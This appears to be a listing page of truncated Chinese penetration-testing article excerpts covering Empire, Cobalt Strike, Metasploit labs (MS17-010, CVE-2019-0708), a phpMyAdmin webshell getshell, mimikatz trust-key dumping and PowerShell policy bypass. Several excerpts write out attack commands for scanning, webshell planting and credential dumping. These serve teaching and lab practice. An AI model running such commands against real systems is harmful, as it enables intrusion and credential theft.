mimikatz

0x01 简介 Empire是一个后渗透攻击框架。它是一个纯粹的PowerShell代理，具有加密安全通信和灵活架构的附加功能。Empire具有在不需要PowerShell.exe的情况下执行PowerShell代理的方法。它可以迅速采用可后期利用的模块，涵盖范围广泛，从键盘记录器到mimikatz等。这个框架是PowerShell Empire和Python Empire项目的组合; 这使得它用户友好和方便。PowerShell Empire于2015年问世，Python Empire于2016年问世。它类似于Metasploit和Meterpreter。但由于它是命令和控制工具，它允许您更有效地控制PC。 PowerShell提供了丰富的攻击性优势，进一步包括.NET的全部访问，applock白名单以及对Win32的直接访问。它还在内存中构建恶意二进制文件。它提供C2功能，允许您在第一阶段之后植入第二阶段。它也可以用于横向移动。它与其他框架相比发展迅速，且非常方便。此外，由于它不需要PowerShell.exe，它可以让您绕过反病毒。因此，最好使用PowerShell Empire。 0x02 功能 listenter：监听器是一个从我们正在攻击的机器上侦听连接的进程。这有助于Empire将战利品发回攻击者的计算机。 Stager： stager是一段代码

0x00 简介 Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Meterpreter,是一个基于PowerShell的远控木马( www.powershellempire.com ) 0x02 安装 git clone https://github.com/EmpireProject/Empire.git 0x03 使用 help 查看帮助 设置监听 listeners #进入监听线程界面 uselistener #设置监听模式 info #查看具体参数设置 set #设置相应参数 execute #开始监听 uselistener 用来设置监听模式 uselistener <tab> <tab> 查看可以使用的监听模式 uselistener http 采用http监听模式，输入info 查看具体参数设置 Required 为 true 的参数都是需要设置的 set Name Micr067 #设置任务名称 set Host 192.168.190.133 #

Metersploit 集成了渗透阶段的全部利用，从漏洞探测，到漏洞利用，最后到后渗透阶段。本次博客主要抛砖引玉，通过对MS17_010漏洞的复现，来学习Metasploit。 漏洞环境： 靶机：windows 7 (192.168.0.135) 攻击机：kali 2018 (192.168.0.133) 开始之前先来熟悉 Metaspolit 基本术语： Auxiliaries(辅助模块)，Exploit(漏洞利用模块)，Payload(攻击载荷模块)，Post(后期渗透模块)，Encoders(编码工具模块) 1.加载smb扫描模块 msf > search auxiliary/scanner/smb 发现可利用的smb_ms17_010模块 2.加载漏洞扫描模块对ip段进行漏洞扫描： msf > use auxiliary/scanner/smb/smb_ms17_010 msf > set rhosts 192.168.0.100-150 msf > set threads 10 msf > run 发现 192.168.0.135 这台主机可能存在MS17_010漏洞 3.利用nmap对漏洞主机进行探测： msf > nmap -T4 -A 192.168.0.135 发现敏感端口 139,445 开启 4.搜索MS17_010可利用漏洞模块 msf > search

实验环境 攻击机：Kali 2020 攻击机IP：192.168.250.174 靶机：Win Server2008 R2 靶机IP：192.168.250.149 实验工具 GOBY：一款新的网络安全测试工具，它能够针对一个目标企业梳理最全的攻击面信息，同时能进行高效、实战化漏洞扫描，并快速的从一个验证入口点，切换到横向。 mestasploit: 开源的渗透测试框架软件、综合型漏洞利用工具，本次实验使用其漏洞利用模块、meterpreter组件。 实验步骤 漏洞扫描 利用GOBY对目标IP进行扫描，发现该目标存在Windows远程桌面服务漏洞（CVE-2019-0708）。 漏洞验证 使用MSF辅助模块，判断该漏洞是否存在且可利用。 在kali终端内输入 msfconsole 使用search命令查找cve-2019-0708漏洞相关模块。 使用use命令选择要使用的模块，并设置参数 执行run或exploit命令 漏洞利用 确定该漏洞可以被利用之后，使用漏洞利用模块，查看配置信息，填写标记为yes的参数。 配置反弹控制端shell的payload 执行run或exploit命令，成功获取目标主机的session会话 远程登录 执行help命令可以了解meterpreter有哪些功能 获取目标主机hash值，执行hashdump命令

靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 攻击拓扑如下 0x01环境搭建 配置两卡，仅主机模式192.168.52.0网段模拟内网，192.168.72.0网段模拟外网 Kali linux IP 192.168.72.131 win7 IP 192.168.72.130/192.168.52.143 win2003 IP 192.168.72.141 DC 2008 IP 192.168.52.138 0X02信息收集 用nmap找到外网IP地址 netdiscover -i eth0 -r 192.168.72.0/24 御剑扫目录扫到后台 扫到目录http://192.168.72.130/phpmyadmin/ 弱口令root /root进入后台 0x03phpmyadmin后台getshell show variables like '%general%'; #查看日志状态 SET GLOBAL general_log='on' SET GLOBAL general_log_file='C:/phpStudy/www/233.php' 设置路径 SELECT ' ' //写入一句话木马 getshell http://192.168.72.130/233.php 0x04权限提升

一、 获取域信息 在域中，EnterPrise Admins组（仅出现在在林的根域中）的成员具有对目录林中的所有域的完全控制权限。在默认情况下该组包含所有域控制器上具有Administrators权限的用户。 1.查看sales域内计算机当前权限 2.查看payload域内计算机当前权限 二、 利用域信任密钥获取目标域的权限 查看域内信任关系 nltest /domain_trusts 父域的域控制器：win-dc.payload.com 子域的域控制器：win-dc01.selas.payload.com 子域内的计算机：win-test.selas.payload.com 子域内的普通用户：selas\test 使用mimikatz在域控制器中导出并伪造信任密钥，使用kekeo请求访问目标域中目标服务的TGS票据。使用这两个工具便可以创建具有sidHistory的票据，对目标域进行安全测试。 在子域win-dc01.selas.payload.com中使用mimikatz获取需要的信息。 mimikatz.exe privilege::debug "lsadump::lsa /patch /user:tset$" "lsadump::trust /patch" exit Domain : SELAS / S-1-5-21-3286823404-654603728

前言： 默认情况下，PowerShell配置为阻止Windows系统上执行PowerShell脚本。对于渗透测试人员，系统管理员和开发人员而言，这可能是一个障碍，但并非必须如此。 什么是PowerShell执行策略？ PowerShell execution policy 是用来决定哪些类型的PowerShell脚本可以在系统中运行。默认情况下，它是“Restricted”(限制)的。然而，这个设置从来没有算是一种安全控制。相反，它会阻碍管理员操作。这就是为什么我们有这么多绕过它的方法。 为什么我们要绕过执行政策？ 因为人们希望使用脚本实现自动化操作，powershell为什么受到管理员、渗透测试人员、黑客的青睐，原因如下： Windows原生支持 能够调用Windows API 能够运行命令而无需写入磁盘（可直接加载至内存，无文件落地） 能够避免被反病毒工具检测 大多数应用程序白名单解决方案已将其标记为“受信任” 一种用于编写许多开源Pentest工具包的媒介 如何查看执行策略 在能够使用所有完美功能的PowerShell之前，攻击者可以绕过“Restricted”(限制)execution policy。你可以通过PowerShell命令“executionpolicy“看看当前的配置。如果你第一次看它的设置可能设置为“Restricted”(限制)，如下图所示： Get

0x001-Cobaltstrike简介 Cobalt Strike是一款美国Red Team开发的 渗透测试 神器，常被业界人称为CS。这款神器许多大佬们都已经玩的很6，我一个菜鸡玩的略有心得，因此写一下自己的Cobaltstrike系列文章，希望给各位一点帮助。 最近这个工具大火，成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式，集成了提权，凭据导出，端口转发，socket代理，office攻击，文件捆绑，钓鱼等功能。同时，Cobalt Strike还可以调用Mimikatz等其他知名工具，因此广受黑客喜爱。 项目官网: https://www.cobaltstrike.com 话说这个工具的社区版是大家熟知的Armitage(一个MSF的图形化界面工具)，而Cobaltstrike大家可以理解其为Armitage的商业版。 0x002-Cobaltstrike架构 本人使用的是Cabaltstrike3.13版本，虽然官方已经更新到3.14版本，但是我发现3.14版本并不稳定，因此不推荐使用 3.13版本文件架构如下。 │ Scripts 用户安装的插件 │ Log 每天的日志 │ c2lint 检查profile的错误异常 │ cobaltstrike │ cobaltstrike.jar 客户端程序 │ icon.jpg LOGO │ license.pdf

作者：启明星辰ADLab 原文链接： https://mp.weixin.qq.com/s/Agr3doBvYMK6Bs0tH6urcw 引言 Cobalt Strike是一款商业化的渗透测试利器，由著名的攻防专业团队Strategic Cyber开发。该工具被广泛应用于渗透测试项目中，在提高政府和企业网络设施安全性上起到了重要的作用。同时，随着网络空间的红蓝对抗不断发展，该框架成为对手模拟和红队行动中最为流行的一款软件。但由于该框架具备团队协作攻击、流量防检测、防安全软件查杀等优势，因而也被大量黑客组织用于真实的高危害性的攻击。目前已知的多个APT组织都曾经使用过Cobalt Strike攻击框架，如FIN6、Cobalt Group组织和“海莲花”等。但是，目前所披露出来的攻击情报只是黑客利用Cobalt Strike进行非法攻击的冰山一角。由于该框架集成有丰富的逃避流量监测和沙箱检测技术，且具备优秀的反追踪能力，再结合黑客团体积累的免杀技术和C&C隐藏技术，使得业内对Cobalt Strike框架的在野利用状况知之甚少，也很难有一个全面的了解和清晰的认知。这种情况直接导致大量依赖于Cobalt Strike框架进行的网络攻击行为被忽视或者漏掉，如目前仍然存在许多VT查杀率为0的样本以及因利用C&C隐藏技术而存活至今的控制命令服务器。 因此

残酷的罪犯在网络上建立持久性达数月之久。 微软的威胁防护情报团队警告说，在大流行危机期间，勒索软件犯罪分子继续***健康中心和关键服务提供商，并已发布详细指南，说明如何降低遭受受害者***的风险。 微软表示，勒索软件***并非以自动方式进行。 取而代之的是，它们是由犯罪团伙进行的，这些犯罪团伙通过破坏面向互联网的网络设备来工作，以便在***和窃取并加密受害者数据的几个月之前就在脆弱的系统上建立存在。 微软指出，***者拥有多种媒介，可以利用它们进入受害者的网络，并在其中横向移动以获取凭据并为最终的勒索软件激活做准备。 Microsoft安全团队观察到的最近的勒索软件活动具有远程桌面协议或虚拟桌面系统，这些系统无法通过多因素身份验证进行保护。 较旧，不受支持且未打补丁的操作系统（例如密码弱的Microsoft Windows Server 2003和2008），配置错误的Web服务器（包括Internet Information Services），备份服务器，电子健康记录软件和系统管理服务器，目前都受到了***。 易受***的Citrix Application Delivery Controller和Pulse Secure也在勒索软件犯罪分子的视线范围内，应尽快进行修补。 勒索软件犯罪分子一旦获得了访问脆弱的，面向互联网的设备和端点的权限，便会尝试窃取管理员登录凭据